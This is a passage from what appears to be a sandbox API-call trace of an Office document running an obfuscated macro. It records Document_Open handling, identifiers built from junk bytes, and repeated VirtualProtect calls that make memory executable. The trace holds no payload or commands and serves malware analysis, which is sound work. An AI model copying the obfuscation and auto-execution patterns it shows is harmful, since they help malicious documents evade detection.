(hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0094.042] GetAsyncKeyState (vKey=3) returned 0 [0094.043] GetAsyncKeyState (vKey=3) returned 0 [0094.043] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0094.043] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0094.047] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197c5c | out: ppsaOut=0x197c5c) returned 0x0 [0094.047] SafeArrayAllocData (psa=0xc98b980) returned 0x0 [0094.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.050] CRetailMalloc_Alloc () returned 0xc96a588 [0094.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc96a588, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x97\x96\x96\x97\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96\x96\x97\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x97\x97\x96\x97\x96\x97\x96\x97\x96\x97\x97\x97\x96\x96\x96\x96\x96\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x96\x96\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x97\x97\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.050] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x96\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x97\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x96\x97\x96\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96\x96\x96\x97\x97\x97\x97\x97\x97\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97\x97\x97\x96\x96\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x97\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x97\x97\x97\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96\x96\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x97\x97\x96\x96\x96\x96\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x97\x96\x97\x96\x96\x97\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="tzNBn4nTiI", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0094.051] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x97\x97\x96\x96\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x96\x96\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x96\x96\x96\x96\x97\x97\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x96\x97\x97\x96\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="Document_Open", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x97\x97\x96\x96\x97\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x97\x96\x97\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0094.052] CRetailMalloc_Free () returned 0x1 [0094.052] longjmp () [0094.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.052] CRetailMalloc_Alloc () returned 0xc96a588 [0094.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc96a588, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0094.052] CRetailMalloc_Free () returned 0x1 [0094.052] longjmp () [0095.320] SafeArrayDestroyData (psa=0xc98b980) returned 0x0 [0095.320] SafeArrayDestroyDescriptor (psa=0xc98b980) returned 0x0 [0095.320] GetAsyncKeyState (vKey=3) returned 0 [0095.505] CRetailMalloc_Alloc () returned 0xf52f180 [0095.505] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.505] memcpy (in: _Dst=0xb2a5270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0095.505] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.505] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x97\x96\x96\x97\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0095.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82dce, cbMultiByte=30, lpWideCharStr=0x1976c4, cchWideChar=31 | out: lpWideCharStr="–—–—–———–——–––––––—––—–––—––—") returned 30 [0095.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a407be, cbMultiByte=30, lpWideCharStr=0x197724, cchWideChar=31 | out: lpWideCharStr="–—–—–———–——–––––––—––—–––—––—") returned 30 [0095.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a407be, cbMultiByte=30, lpWideCharStr=0x197724, cchWideChar=31 | out: lpWideCharStr="–—–—–———–——–––––––—––—–––—––—") returned 30 [0095.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a407be, cbMultiByte=30, lpWideCharStr=0x197724, cchWideChar=31 | out: lpWideCharStr="–—–—–———–——–––––––—––—–––—––—") returned 30 [0095.506] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x97\x96\x96\x97\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0095.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a407be, cbMultiByte=30, lpWideCharStr=0x197724, cchWideChar=31 | out: lpWideCharStr="–—–—–———–——–––––––—––—–––—––—") returned 30 [0095.506] CRetailMalloc_Alloc () returned 0xc98bd90 [0095.506] _mbscpy_s (in: _Dst=0xc98bd90, _DstSizeInBytes=0x1e, _Src=0x9a407be | out: _Dst=0xc98bd90) returned 0x0 [0095.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40b3a, cbMultiByte=37, lpWideCharStr=0x197734, cchWideChar=38 | out: lpWideCharStr="_B_var_–—–—–———–——–––––––—––—–––—––—") returned 37 [0095.506] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x1e, _Src=0x9a407be | out: _Dst=0x19779c) returned 0x0 [0095.506] CRetailMalloc_Free () returned 0x1 [0095.506] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0095.507] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.507] memcpy (in: _Dst=0xb2a516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0095.507] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.507] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.507] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.507] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.507] memcpy (in: _Dst=0xf52f1f8, _Src=0x197944, _Size=0x18 | out: _Dst=0xf52f1f8) returned 0xf52f1f8 [0095.507] CRetailMalloc_Realloc () returned 0xf52f180 [0095.507] CRetailMalloc_Free () returned 0x1 [0095.507] GetCurrentProcess () returned 0xffffffff [0095.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.507] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.515] GetCurrentProcess () returned 0xffffffff [0095.515] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.515] GetCurrentProcess () returned 0xffffffff [0095.515] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.515] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.516] GetCurrentProcess () returned 0xffffffff [0095.516] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.516] GetCurrentProcess () returned 0xffffffff [0095.516] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.516] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.517] GetCurrentProcess () returned 0xffffffff [0095.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.517] GetCurrentProcess () returned 0xffffffff [0095.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.517] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.517] GetCurrentProcess () returned 0xffffffff [0095.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.517] GetCurrentProcess () returned 0xffffffff [0095.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.517] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.518] GetCurrentProcess () returned 0xffffffff [0095.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.518] GetCurrentProcess () returned 0xffffffff [0095.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.518] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.518] GetCurrentProcess () returned 0xffffffff [0095.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.518] GetCurrentProcess () returned 0xffffffff [0095.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.518] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.519] GetCurrentProcess () returned 0xffffffff [0095.519] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.519] GetCurrentProcess () returned 0xffffffff [0095.519] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.519] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.520] GetCurrentProcess () returned 0xffffffff [0095.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.520] GetCurrentProcess () returned 0xffffffff [0095.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.520] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.520] GetCurrentProcess () returned 0xffffffff [0095.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.520] GetCurrentProcess () returned 0xffffffff [0095.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.520] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.521] GetCurrentProcess () returned 0xffffffff [0095.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.521] GetCurrentProcess () returned 0xffffffff [0095.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.521] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.521] GetCurrentProcess () returned 0xffffffff [0095.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.521] GetCurrentProcess () returned 0xffffffff [0095.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.521] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.522] GetCurrentProcess () returned 0xffffffff [0095.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.522] GetCurrentProcess () returned 0xffffffff [0095.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.522] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.522] GetCurrentProcess () returned 0xffffffff [0095.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.523] GetCurrentProcess () returned 0xffffffff [0095.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.523] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.524] GetCurrentProcess () returned 0xffffffff [0095.524] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.524] GetCurrentProcess () returned 0xffffffff [0095.524] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.524] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.525] GetCurrentProcess () returned 0xffffffff [0095.525] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.525] GetCurrentProcess () returned 0xffffffff [0095.525] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.525] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.526] GetCurrentProcess () returned 0xffffffff [0095.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.526] GetCurrentProcess () returned 0xffffffff [0095.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.526] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.526] GetCurrentProcess () returned 0xffffffff [0095.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.526] GetCurrentProcess () returned 0xffffffff [0095.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.527] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.527] GetCurrentProcess () returned 0xffffffff [0095.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.527] GetCurrentProcess () returned 0xffffffff [0095.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.527] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.528] GetCurrentProcess () returned 0xffffffff [0095.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.528] GetCurrentProcess () returned 0xffffffff [0095.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.528] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.529] GetCurrentProcess () returned 0xffffffff [0095.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.529] GetCurrentProcess () returned 0xffffffff [0095.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.529] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.530] GetCurrentProcess () returned 0xffffffff [0095.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.530] GetCurrentProcess () returned 0xffffffff [0095.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.530] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.531] GetCurrentProcess () returned 0xffffffff [0095.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.531] GetCurrentProcess () returned 0xffffffff [0095.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.531] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.532] GetCurrentProcess () returned 0xffffffff [0095.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.532] GetCurrentProcess () returned 0xffffffff [0095.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.532] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.533] GetCurrentProcess () returned 0xffffffff [0095.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.533] GetCurrentProcess () returned 0xffffffff [0095.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.533] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.533] GetCurrentProcess () returned 0xffffffff [0095.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.533] GetCurrentProcess () returned 0xffffffff [0095.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.534] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.534] GetCurrentProcess () returned 0xffffffff [0095.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.534] GetCurrentProcess () returned 0xffffffff [0095.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.534] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0095.535] GetCurrentProcess () returned 0xffffffff [0095.535] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 